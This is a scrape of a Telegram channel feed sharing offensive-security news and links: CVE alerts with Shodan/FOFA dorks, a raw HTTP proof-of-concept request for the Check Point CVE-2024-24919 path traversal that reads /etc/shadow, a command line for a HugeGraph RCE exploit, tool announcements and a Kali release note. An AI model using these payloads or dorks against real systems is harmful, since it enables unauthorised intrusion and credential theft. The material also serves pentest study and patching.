SecList for CyberStudents
239 subscribers
596 photos
24 videos
211 files
905 links
Think outside the box
Download Telegram
🚨CVE-2024-24919🚨

💥Shodan Dork: title:"Check Point" ssl:"target"

🤠POC:

POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow
🔥3
🚨CVE-2024-4956:Nexus Repository Flaw Exposed🚨

⚠️This vulnerability, discovered and responsibly reported by @erickfernandox, could allow attackers to access and download sensitive system files without authentication.

👉Dorks:
Hunter:/product.name="Nexus Repository"
FOFA:app="Nexus-Repository-Manager"
SHODAN:http.html:"Nexus Repository"

POC: https://github.com/vulhub/vulhub/tree/master/nexus/CVE-2024-4956
CVE-2024-27348: Unauthenticated users can execute OS commands via Groovy injection in Apache HugeGraph-Server. Upgrade to version 1.3.0 to mitigate.

💥POC: https://lnkd.in/g_v4h7Cg

👉Dorks:
Hunter: /product.name="Apache HugeGraph"
FOFA: app="HugeGraph-Studio"
SHODAN: http.title:"HugeGraph"
Mindmap. Pentesting active ‎directory.

•  Вероятно, что это самая большая и актуальная Mindmap по пентесту active ‎directory на сегодняшний день. Можно подчеркнуть для себя огромное количество полезной информации и использовать как CheatSheet: https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg

#AD #Mindmap
Forwarded from Proxy Bar
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2024-5326 WordPress
*
Post Grid Gutenberg и плагин PostX = 4.1.2
User Contributor включает регистрацию новых пользователей и устанавливает роль по умолчанию для новых пользователей — Администратор.
*
POC exploit

#wordpress #exploit
👍1
Forwarded from Kali Linux
⚡️ Вышла Kali Linux 2024.2 с 18 новыми инструментами и решением Проблемы 2038 года

Представлена новая версия
Kali Linux 2024.2, в которую вошли сразу 18 новых инструментов, а также исправление для известной проблемы Y2038.

В новой версии пока не доступно ядро Linux 6.8, но оно ожидается в следующей версии (2024.3).

Зато релиз содержит 18 новых куртых инструментов:

* autorecon: многопоточный инструмент для сетевой разведки
* coercer: автоматическое принуждение Windows-сервера к аутентификации на произвольной машине
* dploot: переписанная на Python версия SharpDPAPI
* getsploit: утилита для поиска и загрузки эксплоитов
* gowitness: утилита для создания скриншотов с использованием Chrome Headless
* horst: оптимизированный инструмент для радиосканирования
* ligolo-ng: инструмент для туннелирования через интерфейс TUN
* mitm6: взлом IPv4 через IPv6
* netexec — инструмент для эксплуатации сетевых служб, который помогает автоматизировать оценку безопасности больших сетей;
* pspy — инструмент для мониторинга процессов Linux без root-прав;
* pyinstaller — преобразование (упаковка) Python-программ в самостоятельные исполняемые файлы;
* pyinstxtractor — экстрактор PyInstalller;
* sharpshooter — фреймворк для генерации полезных нагрузок;
* sickle — инструмент для разработки полезных нагрузок;
* snort — гибкая система для обнаружения сетевых вторжений;
* sploitscan — простой поиск информации о CVE;
* vopono — запуск приложений через VPN-туннели с временными сетевыми пространствами имен (namespace);
* waybackpy — API для Wayback Machine с помощью Python.

В данном релизе исправлена проблема Y2038. Она возникает на Linux-системах из-за 32-битного представления времени. Чтобы решить проблему, time_t был изменен на 64-битный на 32-битных архитектурах ARM, которые используются в основном в образах для Raspberry Pi и NetHunter.

В дополнение к новым инструментам и исправлениям, Kali 2024.2 включает:

* Gnome 46 с обновленными темами и расширениями
* Обновленный Xfce для повышения стабильности и производительности

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
👺TotalRecall

This tool extracts and displays data from the Recall feature in Windows 11, providing an easy way to access information about your PC's activity snapshots.

https://github.com/xaitax/TotalRecall

#cybersecurity #pentesting #redteam
👍1
https://github.com/kljunowsky/CVE-2024-27348

Usage:
python3 CVE-2024-27348.py -t https://target.tld:8080 -c "command to execute"


#Apache #RCE
👍1
🚨OneDorkForAll🚨

👉An insane list of all dorks taken from everywhere from various different sources. Google, Shodan, Github. Bug bounty dorks (includes private programs), shodan, github, CCTV, CMS dorks, lfi, sqli, xss, more vulns + an extra 1Mil+ dorks.

🔗https://github.com/HackShiv/OneDorkForAll
👍1